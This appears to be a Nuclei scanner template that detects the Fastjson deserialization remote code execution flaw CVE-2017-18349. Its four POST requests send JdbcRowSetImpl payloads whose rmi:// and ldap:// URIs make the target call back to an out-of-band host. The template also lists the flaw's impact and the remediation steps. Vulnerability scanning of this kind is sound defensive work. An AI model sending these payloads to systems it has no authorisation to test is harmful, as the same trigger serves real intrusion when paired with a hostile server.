id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later, which includes security patches for this vulnerability. Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`. Implement strict whitelist filtering for `@type` annotations, and validate and sanitize all JSON input. Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.8869
    epss-percentile: 0.99526
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast,vkev,vuln

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip
# digest: 4a0a00473045022100af94d3ec5494bdc03305ac81e620f59dff631c3472070cac5ea7564b935d689702200a199c1add00bfc504cbc83686da9e784a4d46f60d0b69e1226abc1585995b2c:922c64590222798bb761d5b6d8e72950